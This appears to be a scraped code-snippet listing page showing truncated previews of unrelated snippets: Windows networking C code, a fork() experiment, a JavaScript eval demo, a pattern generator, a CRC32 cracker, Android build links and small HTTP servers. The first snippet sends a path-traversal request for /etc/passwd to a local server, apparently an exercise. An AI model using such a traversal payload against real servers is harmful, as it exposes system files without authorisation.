ahnmo@peterparker:~$ cat is511.py
import socket
HOST = 'localhost'
PORT = 3000
payload = 'GET /../../../../../../../../etc/passwd HTTP/1.0\r\n\r\n'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <wininet.h> | |
| #include <stdio.h> | |
| #pragma comment (lib, "Wininet.lib") | |
| int main(int argc, char *argv[]) { | |
| HINTERNET hSession = InternetOpen( | |
| L"Mozilla/5.0", // User-Agent |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <winsock2.h> | |
| #include <iphlpapi.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #pragma comment(lib, "IPHLPAPI.lib") | |
| #define MALLOC(x) HeapAlloc(GetProcessHeap(), 0, (x)) | |
| #define FREE(x) HeapFree(GetProcessHeap(), 0, (x)) | |
| int __cdecl main() { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * fork.c | |
| * Experimental fork() on Windows. Requires NT 6 subsystem or | |
| * newer. | |
| * | |
| * Copyright (c) 2012 William Pitcock <nenolod@dereferenced.org> | |
| * | |
| * Permission to use, copy, modify, and/or distribute this software for any | |
| * purpose with or without fee is hereby granted, provided that the above | |
| * copyright notice and this permission notice appear in all copies. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| var x = 'outter'; | |
| (function () { | |
| var x = 'inner'; | |
| alert(eval('x')); | |
| })(); | |
| // inner |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| """Utility functions to work with character patterns.""" | |
| __lower_alpha = 'abcdefghijklmnopqrstuvwxyz' | |
| __upper_alpha = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' | |
| __numeric = '0123456789' | |
| def pattern_create(length, charsets=None): | |
| """Generates a unique, nonrepeating pattern of a given length. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from binascii import crc32 | |
| sample_str = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" | |
| target = 77236792 | |
| def check(x): | |
| return crc32(x) == target | |
| def crack(cur, size): | |
| for i in sample_str: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://developers.google.com/android/drivers#sailfishopr3.170623.013 | |
| https://manatails.net/blog/2018/06/building-userdebug-android-images-for-pixel/ | |
| https://source.android.com/setup/build/downloading | |
| https://source.android.com/setup/build/building | |
| https://source.android.com/setup/build/running | |
| https://developers.google.com/android/images#sailfish | |
| https://source.android.com/setup/start/build-numbers#source-code-tags-and-builds |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import SimpleHTTPServer | |
| import SocketServer | |
| import logging | |
| import sys | |
| import os | |
| PORT = 3000 | |
| BASE = '..' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import BaseHTTPServer, SimpleHTTPServer | |
| PORT = 8080 | |
| class SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler): | |
| def do_GET(self): | |
| self.send_response(200) | |
| self.end_headers() | |
| self.wfile.write(b'<h1 style="text-align: center">UNDER CONSTRUCTION</h1>') |